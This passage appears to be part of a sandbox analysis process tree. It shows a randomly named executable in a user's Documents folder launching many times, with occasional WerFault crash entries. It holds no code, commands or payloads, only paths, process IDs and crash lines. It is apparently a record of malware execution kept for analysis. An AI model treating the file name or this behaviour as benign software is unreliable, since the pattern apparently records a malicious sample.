- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6944
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 28
      4⤵
      Program crash
      PID:4460
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1592
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6276
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 28
      4⤵
      Program crash
      PID:7088
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:3832
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4752
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5012
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6212
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6392
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7464
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1124
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7756
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8256
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1056
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7700
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1828
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8760
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8732
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8736
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8044
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8876
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7548
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1148
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9048
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7672
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:2732
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8648
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4476
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6620
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8352
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:3224
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1396
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 28
      4⤵
      Program crash
      PID:2780
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4864
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7456
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4104
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4304
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8668
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5492
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7164
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:2148
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 28
      4⤵
      Program crash
      PID:10028
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4044
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10136
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7472
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10204
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7692
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 28
      4⤵
      Program crash
      PID:4300
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5324
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1176
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10280
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10424
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10496
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10640
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10856
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11060
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8168
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6824
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10736
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10996
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6860
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10588
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7812
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4768
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4176
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8216
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8680
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:2948
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9944
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7088
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1200
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11228
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6076
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6120
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5244
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6720
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5056
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1540
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:3620
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5660
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9808
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9772
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4960
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11104
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10440
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6308
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9740
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10964
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9308
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4448
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5972
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11444
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11896
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:3112
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11844
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:12196
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:12212
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:3924
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1336
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5260
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:12844
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:932
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:12788
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5248
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:12648
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 12648 -s 164
      4⤵
      Program crash
      PID:3764
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9104
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8360
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9644
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9356
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:14600
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:15016
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9428
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:14808
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:15788
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:16188
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:15384
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:15924
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:16164
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9456
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:12276
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7564
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11776
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:12068
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7308
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:16272
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:14008
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:15136
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:16536
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9476
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:16460
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:16852
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11640
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:14392
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:14684
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9320
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:15000
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11872
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:17260
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:968
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:17168
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:17492
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:17908
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1648
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:17516
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:15640
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:10924
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:12984
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:18460
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:17984
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:18060
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:14564
